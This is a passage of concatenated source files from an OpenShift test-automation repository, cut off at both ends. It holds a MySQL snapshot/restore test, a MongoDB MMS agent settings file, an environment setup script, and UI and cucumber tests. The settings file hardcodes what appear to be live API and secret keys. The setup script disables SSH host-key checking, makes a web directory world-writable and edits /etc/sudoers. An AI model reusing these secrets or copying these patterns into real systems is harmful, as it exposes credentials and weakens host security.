self.mysql_dbname, self.mysql_user, self.mysql_passwd)\n elif self.test_variant in ('perl'):\n cmd = \"cd '%s/perl/' && cp -f '%s/app_template/bigdata/mysql/mysql.pl' . && sed -i -e 's/#host/%s/g' mysql.pl && sed -i -e 's/#port/%s/g' mysql.pl && sed -i -e 's/#dbname/%s/g' mysql.pl && sed -i -e 's/#user/%s/g' mysql.pl && sed -i -e 's/#passwd/%s/g' mysql.pl && git add . && git commit -amt && git push\" % (self.git_repo, OpenShiftTest.WORK_DIR, self.mysql_host, self.mysql_port, self.mysql_dbname, self.mysql_user, self.mysql_passwd)\n elif self.test_variant in ('python'):\n cmd = \"cd '%s/wsgi/' && cp -f '%s/app_template/bigdata/mysql/application' . && sed -i -e 's/#host/%s/g' application && sed -i -e 's/#port/%s/g' application && sed -i -e 's/#dbname/%s/g' application && sed -i -e 's/#user/%s/g' application && sed -i -e 's/#passwd/%s/g' application && git add . && git commit -amt && git push\" % (self.git_repo, OpenShiftTest.WORK_DIR, self.mysql_host, self.mysql_port, self.mysql_dbname, self.mysql_user, self.mysql_passwd)\n elif self.test_variant in ('ruby', 'ruby-1.9'):\n cmd = \"cd '%s/' && cp -f %s/app_template/bigdata/mysql/{config.ru,Gemfile} . ; bundle check ; bundle install ; sed -i -e 's/#host/%s/g' config.ru && sed -i -e 's/#port/%s/g' config.ru && sed -i -e 's/#dbname/%s/g' config.ru && sed -i -e 's/#user/%s/g' config.ru && sed -i -e 's/#passwd/%s/g' config.ru && git add . && git commit -amt && git push\" % (self.git_repo, OpenShiftTest.WORK_DIR, self.mysql_host, self.mysql_port, self.mysql_dbname, self.mysql_user, self.mysql_passwd)\n ret = common.command_get_status(cmd)\n self.assert_equal(ret, 0, \"Failed to copy sample app to local git repo and git push\")\n\n self.step(\"Wait for the app to become available\")\n url = self.url_dict[self.test_variant][\"show\"]\n ret = common.grep_web_page(url, 'There is no record in database', \"-H 'Pragma: no-cache' -L\", 5, 6)\n self.assert_equal(ret, 0, \"The app doesn't become available in reasonable time\")\n\n self.step(\"Access the 'insert' page to insert a large amount of records into the mysql database\")\n self.info(\"This step may take a very long time\")\n url = self.url_dict[self.test_variant][\"insert\"]\n cmd = \"curl -H 'Pragma: no-cache' -L '%s'\" % (url)\n ret = common.command_get_status(cmd, timeout=-1)\n\n\ttime.sleep(280)\n self.step(\"Check mysql data exists\")\n url = self.url_dict[self.test_variant][\"show\"]\n ret = common.grep_web_page(url, [\"There are %s records in database\" % (self.record_count), \"This is testing data for testing snapshoting and restoring big data in mysql database\"],\n \"-H 'Pragma: no-cache' -L\", 5, 6, True)\n self.assert_equal(ret, 0, \"The MySQL data doesn't exist\")\n\n self.step(\"Take snapshot of the app\")\n self.info(\"This step may take a very long time. If it hangs forever, please terminate this script and test manually\")\n cmd = \"rm -f %s.tar.gz ; rhc snapshot save %s -f %s.tar.gz -l %s -p '%s' %s\" % (self.app_name, self.app_name, self.app_name, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS)\n ret = common.command_get_status(cmd, timeout=-1)\n self.assert_equal(ret, 0, \"Failed to save snapshot\")\n\n self.step(\"Destroy the app\")\n ret = common.destroy_app(self.app_name, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, True)\n self.assert_equal(ret, 0, \"Failed to destroy app: %s\" % (self.app_name))\n\n self.step(\"Create a new app with the same name\")\n ret = common.create_app(self.app_name, common.app_types[self.test_variant], self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, True, \"./\", self.scalable)\n self.assert_equal(ret, 0, \"Failed to re-create %s app: %s\" % (self.app_type, self.app_name))\n\n self.step(\"Embed mysql to the new app\")\n ret = common.embed(self.app_name, \"add-\" + common.cartridge_types[\"mysql\"], self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd)\n self.assert_equal(ret, 0, \"Failed to embed mysql to the app\")\n\n self.step(\"Use the snapshot tarball to restore it\")\n self.info(\"This step may take a very long time. If it hangs forever, please terminate this script and test manually\")\n cmd = \"rhc snapshot restore %s -f %s.tar.gz -l %s -p '%s' %s\" % (self.app_name, self.app_name, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS)\n ret = common.command_get_status(cmd, timeout=-1)\n self.assert_equal(ret, 0, \"Failed to restore the new app\")\n\n self.step(\"Modify the git repo\")\n self.mysql_user = OSConf.default.conf['apps'][self.app_name]['embed'][common.cartridge_types[\"mysql\"]][\"username\"]\n self.mysql_passwd = OSConf.default.conf['apps'][self.app_name]['embed'][common.cartridge_types[\"mysql\"]][\"password\"]\n self.mysql_dbname = OSConf.default.conf['apps'][self.app_name]['embed'][common.cartridge_types[\"mysql\"]][\"database\"]\n self.mysql_host = OSConf.default.conf['apps'][self.app_name]['embed'][common.cartridge_types[\"mysql\"]][\"url\"]\n self.mysql_port = OSConf.default.conf['apps'][self.app_name]['embed'][common.cartridge_types[\"mysql\"]][\"port\"]\n if self.test_variant in ('php'):\n cmd = \"cd '%s/php/' && git pull ; \\cp -f '%s/app_template/bigdata/mysql/mysql.php' . && sed -i -e 's/#host/%s/g' mysql.php && sed -i -e 's/#port/%s/g' mysql.php && sed -i -e 's/#dbname/%s/g' mysql.php && sed -i -e 's/#user/%s/g' mysql.php && sed -i -e 's/#passwd/%s/g' mysql.php && git add . && git commit -amt && git push\" % (self.git_repo, OpenShiftTest.WORK_DIR, self.mysql_host, self.mysql_port, self.mysql_dbname, self.mysql_user, self.mysql_passwd)\n elif self.test_variant in ('jbossas', 'jbosseap'):\n cmd = \"cd '%s/src/main/webapp/' && git pull && cp -f '%s/app_template/bigdata/mysql/mysql.jsp' . && sed -i -e 's/#host/%s/g' mysql.jsp && sed -i -e 's/#port/%s/g' mysql.jsp && sed -i -e 's/#dbname/%s/g' mysql.jsp && sed -i -e 's/#user/%s/g' mysql.jsp && sed -i -e 's/#passwd/%s/g' mysql.jsp && git add . && git commit -amt && git push\" % (self.git_repo, OpenShiftTest.WORK_DIR, self.mysql_host, self.mysql_port, self.mysql_dbname, self.mysql_user, self.mysql_passwd)\n elif self.test_variant in ('perl'):\n cmd = \"cd '%s/perl/' && git pull && cp -f '%s/app_template/bigdata/mysql/mysql.pl' . && sed -i -e 's/#host/%s/g' mysql.pl && sed -i -e 's/#port/%s/g' mysql.pl && sed -i -e 's/#dbname/%s/g' mysql.pl && sed -i -e 's/#user/%s/g' mysql.pl && sed -i -e 's/#passwd/%s/g' mysql.pl && git add . && git commit -amt && git push\" % (self.git_repo, OpenShiftTest.WORK_DIR, self.mysql_host, self.mysql_port, self.mysql_dbname, self.mysql_user, self.mysql_passwd)\n elif self.test_variant in ('python'):\n cmd = \"cd '%s/wsgi/' && git pull && cp -f '%s/app_template/bigdata/mysql/application' . && sed -i -e 's/#host/%s/g' application && sed -i -e 's/#port/%s/g' application && sed -i -e 's/#dbname/%s/g' application && sed -i -e 's/#user/%s/g' application && sed -i -e 's/#passwd/%s/g' application && git add . && git commit -amt && git push\" % (self.git_repo, OpenShiftTest.WORK_DIR, self.mysql_host, self.mysql_port, self.mysql_dbname, self.mysql_user, self.mysql_passwd)\n elif self.test_variant in ('ruby', 'ruby-1.9'):\n cmd = \"cd '%s/' && git pull && cp -f %s/app_template/bigdata/mysql/config.ru . ; bundle check ; bundle install ; sed -i -e 's/#host/%s/g' config.ru && sed -i -e 's/#port/%s/g' config.ru && sed -i -e 's/#dbname/%s/g' config.ru && sed -i -e 's/#user/%s/g' config.ru && sed -i -e 's/#passwd/%s/g' config.ru && git add . && git commit -amt && git push\" % (self.git_repo, OpenShiftTest.WORK_DIR, self.mysql_host, self.mysql_port, self.mysql_dbname, self.mysql_user, self.mysql_passwd)\n ret = common.command_get_status(cmd)\n self.assert_equal(ret, 0, \"Failed to modify the git repo\")\n\n self.step(\"Check if the MySQL data is restored\")\n url = self.url_dict[self.test_variant][\"show\"]\n ret = common.grep_web_page(url, [\"There are %s records in database\" % (self.record_count), \"This is testing data for testing snapshoting and restoring big data in mysql database\"],\n \"-H 'Pragma: no-cache' -L\", 5, 6, True)\n self.assert_equal(ret, 0, \"The MySQL data doesn't exist\")\n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(BigMysqlDataTest)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6936644911766052, "alphanum_fraction": 0.7242620587348938, "avg_line_length": 20.037878036499023, "blob_id": "cc8c48ac7074171d05cd37044ec043c3f197f8e7", "content_id": "30ce471232e440f45489e57d879bc4d2f90212f6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2778, "license_type": "no_license", "max_line_length": 124, "num_lines": 132, "path": "/automation/open/testmodules/RT/cartridge/app_template/settings.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\n(C) Copyright 2011, 10gen\n\nUnless instructed by 10gen, do not modify default settings.\n\nWhen upgrading your agent, you must also upgrade your settings.py file.\n\"\"\"\n\n#\n# Seconds between Mongo status checks. Please do not change this.\n#\ncollection_interval = 56\n\n#\n# Seconds between cloud configuration checks. Please do not change this.\n#\nconf_interval = 120\n\n#\n# Seconds between log data collection (if enabled in UI). Please do not change this.\n#\nlog_interval = 5\n\n#\n# The mms server\n#\nmms_server = \"https://mms.10gen.com\"\n\n#\n# The mms ping url\n#\nping_url = mms_server + \"/ping/v1/%s\"\n\n#\n# The mms config url\n#\nconfig_url = mms_server + \"/conf/v2/%(key)s?am=true&ah=%(hostname)s&sk=%(sessionKey)s&av=%(agentVersion)s&sv=%(srcVersion)s\"\n\n#\n# The mms agent version url\n#\nversion_url = mms_server + \"/agent/v1/version/%(key)s\"\n\n#\n# The mms agent upgrade url\n#\nupgrade_url = mms_server + \"/agent/v1/upgrade/%(key)s\"\n\n#\n# The mms agent log path.\n#\nlogging_url = mms_server + \"/agentlog/v1/catch/%(key)s\"\n\n#\n# Enter your API key - See: http://mms.10gen.com/settings\n#\nmms_key = \"0788b0eea2592b764695e7c7e8d7963a\"\n\nsecret_key = \"e25105c6674881bc13addc0415f80d53\"\n\nsrc_version = \"1a5750de968efe6307227591132b3967db0523ed\"\n\n#\n# Enabled by default\n#\nautoUpdateEnabled = True\n\n#\n# The global authentication credentials to be used by the agent.\n#\n# The user must be created on the \"admin\" database.\n#\n# If the global username/password is set then all hosts monitored by the\n# agent *must* use the same username password.\n#\n# Example usage:\n#\n# globalAuthUsername=\"\"\"yourAdminUser\"\"\"\n# globalAuthPassword=\"\"\"yourAdminPassword\"\"\"\n#\n#\n# If you do not use this, the values must be set to None.\n#\n# Please use \"\"\" quotes to ensure everything is escaped properly.\n#\n# E.g.,\n#\n# globalAuthPassword=\"\"\"yourAdminPasswordWith\"DoubleQuotes\"\"\"\n#\n# globalAuthPassword=\"\"\"yourAdminPasswordWith'SingleQuote\"\"\"\n#\n# For more information about MongoDB authentication, see:\n#\n# http://www.mongodb.org/display/DOCS/Security+and+Authentication\n#\n#\n\nglobalAuthUsername = None\n\nglobalAuthPassword = None\n\n#\n# Some config db collection properties\n#\nconfigCollectionsEnabled = True\nconfigDatabasesEnabled = True\n\n#\n# Set to a specific bind address or 0.0.0.0 for all interfaces. Set to None to disable.\n#\nshutdownAgentBindAddr = None\n\n#\n# You must change the shutdown port if you run multiple agents on a machine.\n#\nshutdownAgentBindPort = 23017\n\n#\n# The shutdown agent bind challenge. You can change this to whatever you like. When\n# you send a shutdown message to the agent, this must be the message sent.\n#\nshutdownAgentBindChallenge = '23237NYouCanChangeThis'\n\nsettingsAgentVersion = \"1.4.2\"\n\nuseSslForAllConnections = False\n\n# Set to False if you have no plans to use munin (saves one thread per server)\nenableMunin = True\n\n# Misc - Please do not change this.\nsocket_timeout = 40\n\n" }, { "alpha_fraction": 0.6547619104385376, "alphanum_fraction": 0.6904761791229248, "avg_line_length": 23, "blob_id": "aee96f876fd0858bad640e7b68001f538340909b", "content_id": "a50ae61ea85fa7ab16c99ebebde6c9e670323485", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 168, "license_type": "no_license", "max_line_length": 44, "num_lines": 7, "path": "/automation/open/Longevity/cartridge/insert.sh", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "mysql <<EOF\nuse $1\ncreate table test(id int(8), name char(20));\ninsert into test values('0','openshifit');\ninsert into test values('1','nsun');\nselect * from test;\nEOF\n" }, { "alpha_fraction": 0.6473214030265808, "alphanum_fraction": 0.6596638560295105, "avg_line_length": 28.984251022338867, "blob_id": "17b08eba6a3d49ff6271c04029d361a4ee36de01", "content_id": "73091f937eea91f571f0d2862cad1b37db2bd5f1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 3808, "license_type": "no_license", "max_line_length": 425, "num_lines": 127, "path": "/automation/open/bin/setup_env.sh", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/bin/sh\n\n\nif [ -z \"$1\" ]; then\n echo \"ERROR: Missing argument.\"\n echo \"Usage: $0 <RHTEST_HOME directory>\"\n exit 2\nfi\n\necho \"Please note this script won't be able to install rhc on Fedora 17\"\necho \"Warning: This script will change your kerberos configuration, bashrc, bash_profile and ssh configuration.\"\necho \"Continue?(yes/no)\"\nread answer\nif [ \"$answer\" != \"yes\" ];then\n exit 1\nfi\n\n\nRHTEST_HOME=$1\nTEST_USER=$USER\nPACKAGES_TO_INSTALL=\"git rhc pexpect python-sqlobject expect firefox chromium postgresql postgresql-devel rubygem-rails perl-ExtUtils-MakeMaker perl-Module-Build maven3 gcc-c++ rubygem-sqlite3 rubygem-rack-mount sqlite-devel rubygem-pg mongodb krb5-workstation httpd-tools python-pip python-paramiko python-kerberos python-selenium python-httplib2 java-1.7.0-openjdk ruby-devel python-devel perl-devel mysql-devel spawn make\"\n\n#if [ \"root\" == \"$TEST_USER\" ]; then\n# echo \"ERROR: You must not be the superuser. \"\n# exit 3;\n#fi\n\nsudo touch /tmp || ( echo \"ERROR: SUDO is not configured properly for this user.\"; exit 3; )\n\nset -e\n\n########################\n### APP/LIBS setup ###\n########################\nsudo cp $RHTEST_HOME/etc/repo_key/li.repo /etc/yum.repos.d/\nsudo cp $RHTEST_HOME/etc/repo_key/client-cert.pem /var/lib/yum/client-cert.pem\nsudo cp $RHTEST_HOME/etc/repo_key/client-key.pem /var/lib/yum/client-key.pem\n\n### install all necessary libraries ###\nsudo yum -y --skip-broken update \nsudo yum -y --skip-broken install $PACKAGES_TO_INSTALL\nsudo pip-python install itimer mysql-python sqlobject\n\n########################\n### setup SSH config ###\n########################\n\nmkdir -p $HOME/.ssh\ncp -f $RHTEST_HOME/etc/libra.pem $HOME/.ssh/\nSSH_CONFIG=$HOME/.ssh/config\ntouch $SSH_CONFIG\nif [ -z \"$(grep OPENSHIFT_SETUP $SSH_CONFIG)\" ]; then\n cat <<'EOF' >> $SSH_CONFIG\n### OPENSHIFT_SETUP ###\nHost *.amazonaws.com\n User root\n IdentityFile ~/.ssh/libra.pem\n\nHost *.dev.rhcloud.com\n IdentityFile ~/.ssh/id_rsa\n VerifyHostKeyDNS yes\n StrictHostKeyChecking no\n UserKnownHostsFile ~/.ssh/dev_rhcloud_known_hosts\n\nHost *.rhcloud.com\n VerifyHostKeyDNS yes\n StrictHostKeyChecking no\n UserKnownHostsFile ~/.ssh/rhcloud_known_hosts\n\nEOF\nchmod 0600 $SSH_CONFIG\nfi\n\n########################\n### Kerberos setup #####\n########################\n\nsudo cp -f /etc/krb5.conf{,_backup}\nsudo cp -f $RHTEST_HOME/etc/krb5.conf_example /etc/krb5.conf\n\n########################\n### FRAMEWORK setup ####\n########################\nRUBY_VER=`ruby -v | cut -d' ' -f 2 | cut -d '.' -f 1-2 | tr -d '\\n'`\nGEM_HOME=\"/usr/lib/ruby/gems/$RUBY_VER\"\ntouch $HOME/.bash_profile\nif [ -z \"$(grep OPENSHIFT_SETUP $HOME/.bash_profile)\" ]; then\n echo \"GEM_HOME=$GEM_HOME\" >> $HOME/.bash_profile\n echo 'RHTEST_HOME=$RHTEST_HOME' >> $HOME/.bash_profile\n echo 'PYTHOPATH=$RHTEST_HOME/lib:$RHTEST_HOME/lib/supports:$RHTEST_HOME/testmodules/' >> $HOME/.bash_profile\n echo 'PATH=$PATH:$RHTEST_HOME/bin' >> $HOME/.bash_profile\nfi\n\nRESULTS_DIR=/var/www/html/testresults/\nsudo mkdir -p $RESULTS_DIR\nsudo chmod 777 $RESULTS_DIR\nsudo setfacl -d -m other::rwx $RESULTS_DIR\n\n########################\n### OPENSHIFT setup ####\n########################\nif [ ! -f $HOME/.openshift/express.conf ]; then\n mkdir -p $HOME/.openshift\n cat <<EOF >$HOME/.openshift/express.conf\n\nlibra_server=stg.openshift.redhat.com\n\nEOF\n\nfi\n\nsudo gem install bundle\n#REDIS dependencies\nsudo gem install mail -v '2.2.19'\nsudo gem install rack -v '1.4.1'\nsudo gem install therubyracer\nsudo gem install execjs\nsudo gem install rack-mount -v '0.8.3'\nsudo gem install pg\nsudo gem install redis -v '3.0.1'\nsudo gem install thread-dump -v '0.0.5'\n\n#\n#for jenkins working with sudo we must disable using `requiretty` in /etc/sudoers\n#\nsudo sed -i -e 's/^\\(Defaults\\s\\+requiretty\\)/#\\1/' /etc/sudoers\nexit 0\n" }, { "alpha_fraction": 0.7055476307868958, "alphanum_fraction": 0.7197723984718323, "avg_line_length": 24.10714340209961, "blob_id": "0f82b1a46d24ca84a4288864de698b08caee00d1", "content_id": "cacb70290d72dd146e453ef73c7cea5e2fd1fe3c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 703, "license_type": "no_license", "max_line_length": 96, "num_lines": 28, "path": "/automation/open/testmodules/RT/hot_deploy/jbosseap_without_jenkins.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n\"\"\"\nAttila Nagy\nAug 1, 2012\n\n\"\"\"\nimport rhtest\nimport common\nfrom jbossas_without_jenkins import JBossHotDeployWithoutJenkins\n\nclass EAPHotDeployWithoutJenkins(JBossHotDeployWithoutJenkins):\n def __init__(self, config):\n JBossHotDeployWithoutJenkins.__init__(self, config)\n self.config.application_type = common.app_types['jbosseap']\n self.config.summary = \"[US2422] Hot deployment support for JBoss EAP6 - without Jenkins\"\n \nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(EAPHotDeployWithoutJenkins)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5402504205703735, "alphanum_fraction": 0.5491949915885925, "avg_line_length": 22.25, "blob_id": "63b9889ccc6fcc4e5df840e9628d9672d60a5244", "content_id": "f73429312c51818e65ce5dde68b23990b57d540b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 559, "license_type": "no_license", "max_line_length": 63, "num_lines": 24, "path": "/automation/open/testmodules/RT/cucumber/step_definitions/client_steps.rb", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "Given /^an accepted node$/ do\n accept_node = \"/usr/bin/rhc-accept-node\"\n File.exists?(accept_node).should be_true\n num_tries = 10\n (1..num_tries).each do |i|\n begin\n pass = `sudo #{accept_node}`.chomp \n exit_status = $?.exitstatus\n \n if i == num_tries\n puts pass if pass != \"PASS\"\n puts \"Exit status = #{exit_status}\" if exit_status != 0\n end\n \n exit_status.should be(0)\n pass.should == \"PASS\"\n break\n rescue Exception => e\n if i == num_tries\n raise\n end\n end\n end\nend\n\n" }, { "alpha_fraction": 0.5807743668556213, "alphanum_fraction": 0.6081441640853882, "avg_line_length": 23.145160675048828, "blob_id": "39d45e8c8e94d04df1003f6aa3e9de77b72d4f6e", "content_id": "9f78b8327866c1ffdc29e7a9177b3baae26a8b5a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1498, "license_type": "no_license", "max_line_length": 85, "num_lines": 62, "path": "/automation/open/testmodules/UI/web/case_122244.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_122244.py\n# Date: 2012/07/04 10:56\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\n\nclass Login_invalid_password(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n web.go_to_home()\n time.sleep(5)\n \n #Login using invalid password.\n web.assert_text_equal_by_xpath('SIGN IN',\n '''//div[@id='top']/div/div[2]/a''')\n web.click_element_by_xpath('''//div[@id='top']/div/div[2]/a''')\n web.input_by_id(\"web_user_rhlogin\", \"yujzhang\")\n web.input_by_id(\"web_user_password\", \"123\")\n web.click_element_by_xpath('''//form[@id='login_form']/fieldset/input''')\n time.sleep(10)\n web.assert_text_equal_by_xpath('The supplied login or password was invalid.',\n '''//form[@id='login_form']/ul/li''')\n\n self.tearDown()\n\n return self.passed(\"Case 122244 test passed.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(Login_invalid_password)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of case_122244.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6035182476043701, "alphanum_fraction": 0.6165990233421326, "avg_line_length": 41.63461685180664, "blob_id": "0757476d2c91e4d305762553a1fa5260c578595e", "content_id": "ff49297f55840f2da15d2dcf723728e051827467", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 2217, "license_type": "no_license", "max_line_length": 231, "num_lines": 52, "path": "/automation/open/prepare_testing_data/data/config.ru", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env ruby\nrequire 'rubygems'\nrequire 'bundler'\nrequire 'mysql'\n\nBundler.require\n\n\nget '/' do\n \"[rhc-cartridge]snapshot/restore big mysql data to existing app<br />[rhc-cartridge]snapshot/restore big mysql data to new app<br />\"\nend\n\nget '/mysql' do\n dbh = Mysql.real_connect(\"#host\",\"#user\",\"#passwd\",\"#dbname\",port=#port)\n dbh.query(\"CREATE TABLE IF NOT EXISTS info(id INT NOT NULL AUTO_INCREMENT, data CHAR(200), PRIMARY KEY (id));\")\n dbh.query(\"COMMIT;\")\n action = request.params().fetch(\"action\", \"\")\n size = request.params().fetch(\"size\", \"5000\")\n if action == \"insert\"\n dbh.query(\"SET autocommit=0;\")\n for i in 1..size.to_i()\n dbh.query(\"INSERT INTO info VALUES(NULL, 'This is testing data for testing snapshoting and restoring big data in mysql database.This is testing data for testing snapshoting and restoring big data in mysql database.');\")\n end\n dbh.query(\"COMMIT;\")\n dbh.query(\"SET autocommit=1;\")\n response_body = [200, \"Gear DNS: #{ENV['OPENSHIFT_GEAR_DNS']}<br />\" + size + \" records have been inserted into mysql<br />\"]\n elsif action == \"delete\"\n dbh.query(\"DELETE FROM info;\")\n response_body = [200, \"Gear DNS: #{ENV['OPENSHIFT_GEAR_DNS']}<br />All the records have been deleted from mysql database<br />\"]\n elsif action == \"show\"\n res = dbh.query(\"SELECT COUNT(*) FROM info;\")\n count = res.fetch_row()[0]\n if count.to_i() == 0\n response_body = [200, \"Gear DNS: #{ENV['OPENSHIFT_GEAR_DNS']}<br />There is no record in database<br />\"]\n else\n response_body = [200, \"Gear DNS: #{ENV['OPENSHIFT_GEAR_DNS']}<br />There are \" + count + \" records in database<br />\"]\n end\n if count.to_i() != 0\n res = dbh.query(\"SELECT * FROM info LIMIT 0, 1;\")\n row = res.fetch_row()\n response_body[1] += \"Here is one row: \" + row[1]\n end\n else\n response_body = \"[rhc-cartridge]snapshot/restore big mysql data to existing app<br />[rhc-cartridge]snapshot/restore big mysql data to new app<br />\"\n end\n dbh.query(\"COMMIT;\")\n dbh.close()\n return response_body\nend\n\n\nrun Sinatra::Application\n" }, { "alpha_fraction": 0.6561630964279175, "alphanum_fraction": 0.6561630964279175, "avg_line_length": 21.47916603088379, "blob_id": "a44ac4c38adcae4cde465ee5f76bfdac8a8e9734", "content_id": "2e3dc9da170eb362ff1ad7e92fa0462bb1d554b0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1079, "license_type": "no_license", "max_line_length": 76, "num_lines": 48, "path": "/automation/resultchecker.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n\"\"\"Get all info from output XML file.\n\nAdditionly, this modle can be expanded\nfor reading/checking all test execution result from an output XML file.\n\nOptional `outpath` specifies where to write processed results. If not given,\nresults are written over the original file.\n\nAuthor: xin Gao <[email protected]>\n\"\"\"\n\nfrom robot.api import ExecutionResult, ResultVisitor\n\n\nclass ResultChecker(ResultVisitor):\n\n def __init__(self):\n pass\n\n def visit_test(self, test):\n \"\"\"\n test attrs:\n test.name, test.status, test.message,\n test.doc, test.tags, test.timeout\n test.starttime, test.endtime\n \"\"\"\n #print 'the test name is: ', test.name\n TEST_NAMES.append(test.name)\n\n\nTEST_NAMES = []\n\n\ndef get_all_casenames(output_path):\n \"\"\"\n method for getting all tests name.\n \"\"\"\n result = ExecutionResult(output_path)\n result.visit(ResultChecker())\n return TEST_NAMES\n\n\nif __name__ == '__main__':\n OUTPUT_PATH = 'robotdemo/output.xml'\n TESTS = get_all_casenames(OUTPUT_PATH)\n print TESTS\n" }, { "alpha_fraction": 0.6882989406585693, "alphanum_fraction": 0.7020648717880249, "avg_line_length": 28.852941513061523, "blob_id": "d7c2cc4596f55b25a5ebf2099b703f4e18ff9e66", "content_id": "5a3694eca05e2b033076e29282a739d32a78929d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1017, "license_type": "no_license", "max_line_length": 71, "num_lines": 34, "path": "/automation/open/lib/reports/Eventlog.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n# vim:ts=4:sw=4:softtabstop=0:smarttab\n# \n# Copyright (C) 1999-2004 Keith Dart <[email protected]>\n#\n# This library is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 2.1 of the License, or (at your option) any later version.\n#\n# This library is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU\n# Lesser General Public License for more details.\n\n\"\"\"\nA report type the produces an event log with time stamps.\n\n\"\"\"\n\nimport reports\nimport timelib\nnow = timelib.time\n\n\nclass LogFormatter(reports.StandardFormatter):\n\tMIMETYPE = \"text/plain\"\n\n\tdef message(self, msgtype, msg, level=1):\n\t\treturn \"%s:%s: %s\\n\" % (now(), msgtype, msg)\n\n\t# no summary for logs\n\tdef summary(self, text):\n\t\treturn \"%s:%s:\\n\" % (now(), \"SUMMARY\")\n\n\n" }, { "alpha_fraction": 0.5840597748756409, "alphanum_fraction": 0.6006322503089905, "avg_line_length": 48.23584747314453, "blob_id": "bc1fa11c911e7212f28165c323b6a43ca313e800", "content_id": "51676b84561dbc3244006639f93379d6651849fb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10439, "license_type": "no_license", "max_line_length": 310, "num_lines": 212, "path": "/automation/open/testmodules/UI/web/case_141718.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_165717.py\n# Date: 2012/07/17 11:23\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\n\nclass CheckOpensourcePage(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n\n web.login()\n\n web.create_app(\"python-2.6\",\"python\")\n web.click_element_by_xpath('''//a[contains(@href, '/app/console/help')]''')\n time.sleep(2)\n\n #check the \"Create an app now\" link \n web.assert_text_equal_by_xpath(\"Create an app now\",'''//div[@id='content']/div/div/div/div[2]/div/section/div/p[3]/a''')\n web.click_element_by_link_text(\"Create an app now\")\n time.sleep(2)\n web.assert_text_equal_by_xpath('''cartridges''','''//div[@id='content']/div/div/div/div[2]/div/section/p/strong''') \n web.go_back()\n #check the \"our Getting Started page\" link \n web.assert_text_equal_by_xpath(\"our Getting Started page\",'''//div[@id='content']/div/div/div/div[2]/div/section/div/p[4]/a''')\n web.click_element_by_link_text(\"our Getting Started page\")\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Get Started with OpenShift''','''//div[@id='content']/div/div/div/div/div/h1''') \n web.go_back()\n #check the \"Get Started Fast page\" link \n web.assert_text_equal_by_xpath(\"Get Started Fast page\",'''//div[@id='content']/div/div/div/div[2]/div/section/div/p[5]/a''')\n web.click_element_by_link_text(\"Get Started Fast page\")\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Get Started on OpenShift''','''//div[@id='content']/div/div/div/div[3]/div/h1/div''') \n web.go_back()\n #check the \"Ruby on Rails\" link \n web.assert_text_equal_by_xpath(\"Ruby on Rails\",'''//div[@id='content']/div/div/div/div[2]/div/section/div/p[5]/a[3]''')\n web.click_element_by_link_text(\"Ruby on Rails\")\n 